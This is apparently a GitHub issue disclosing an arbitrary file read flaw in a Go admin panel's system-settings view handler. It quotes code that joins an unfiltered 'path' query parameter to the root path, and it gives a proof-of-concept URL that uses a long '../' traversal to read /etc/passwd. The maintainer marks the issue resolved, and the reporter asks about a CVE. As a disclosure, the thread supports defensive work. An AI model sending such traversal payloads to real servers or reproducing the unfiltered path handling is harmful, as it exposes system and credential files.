Read Any File Vulnerability

[0clickjacking0]

Vulnerability file address

internal/controllers/admin/setting/adminSystemController.go line 135 c.Query("path")The incoming path value is not filtered, resulting in arbitrary file reading

filePath := gstrings.JoinStr(configs.RootPath, c.Query("path"))
	fi, err := os.Open(filePath)
	if err != nil {
		con.ErrorHtml(c, err)
		return
	}

POC

http://ip:port/admin/setting/system/view?path=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Attack results pictures

[gphper]

resolved

[0clickjacking0]

兄弟你好，前两天我交了这两个洞到cve，想拿个cve证书，不知道你那边有没有收到cve的邮件😂 GPER ***@***.***> 于2022年5月10日周二 20:20写道：

…

resolved — Reply to this email directly, view it on GitHub <#9 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AJTV23ZEG3GY6ZJIWPV7OVDVJJICJANCNFSM5VBT3IRA> . You are receiving this because you authored the thread.Message ID: ***@***.***>